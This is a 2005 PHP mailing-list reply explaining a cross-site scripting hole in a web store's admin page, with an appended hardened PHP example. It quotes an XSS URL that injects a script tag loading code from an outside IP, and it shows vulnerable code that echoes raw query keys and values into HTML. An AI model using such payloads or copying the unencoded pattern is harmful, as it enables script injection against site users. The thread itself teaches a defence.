Re: Re: Free penetration test

Chris W. Parker wrote:
> Rasmus Lerdorf <mailto:rasmus@xxxxxxxxxxx>
>     on Friday, May 27, 2005 11:58 AM said:
> 
> 
>>>>You have all sorts of problems at that URL.  To start with, here is
>>>>a cross-site scripting hack: 
>>>>
>>>>
> 
> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
> %09
> 
>>>>src%3D%22http://3423329163/v
> 
> 
> First of all, excellent example.
> 
> 
>>Don't display arbitrary key names in hidden fields the way you are.
> 
> 
> What do you mean by "arbitrary key names"?

He was apparently doing something along the lines of:

  <?php
  // Echoes every query-string key and value straight into the page, so both
  // the attribute name and its value are attacker-controlled and unencoded.
  foreach($_GET as $key=>$val) {
    echo <<<EOL
<input type="hidden" name="$key" value="$val">
EOL;
  }

Probably just a laziness thing.  Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user.  Or if you are going to do it this way,
recognize that you have to filter/encode both the query arg names and
the values.

-Rasmus

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
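The allow-list-plus-encoding approach Rasmus describes above, written out as an added example; this is not code from the original thread, and the `hidden_fields` function and the sample input are constructed here for illustration.

```php
<?php
// Added example (not from the original message): hardened version of the
// "parrot every query arg into a hidden field" pattern discussed above.
// Only known parameter names are re-emitted, and both the name and the
// value are HTML-encoded, so a crafted key such as  "><script src=...
// cannot break out of the attribute.

/**
 * Render hidden inputs for those entries of $params whose names appear
 * in the fixed $allowed list. Everything else is dropped, never echoed.
 */
function hidden_fields(array $params, array $allowed): string
{
    $out = '';
    foreach ($allowed as $key) {
        if (!array_key_exists($key, $params) || !is_string($params[$key])) {
            continue; // unknown or non-scalar args are ignored
        }
        // Encode both halves: the name is user input just as much as the value.
        $name  = htmlspecialchars($key, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $value = htmlspecialchars($params[$key], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $out .= "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
    }
    return $out;
}

// Constructed sample request (hypothetical, modelled on the thread):
// one legitimate parameter plus an attacker-controlled key.
$sample = [
    'page'                                     => '2',
    '"><script src="http://example.invalid/x"' => '',
];

// Only `page` survives the allow-list; the crafted key is never emitted.
// Had it been allowed, encoding would still turn `"` into `&quot;` and
// `<` into `&lt;`, so it could not close the attribute or open a tag.
echo hidden_fields($sample, ['page', 'sort']);
```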

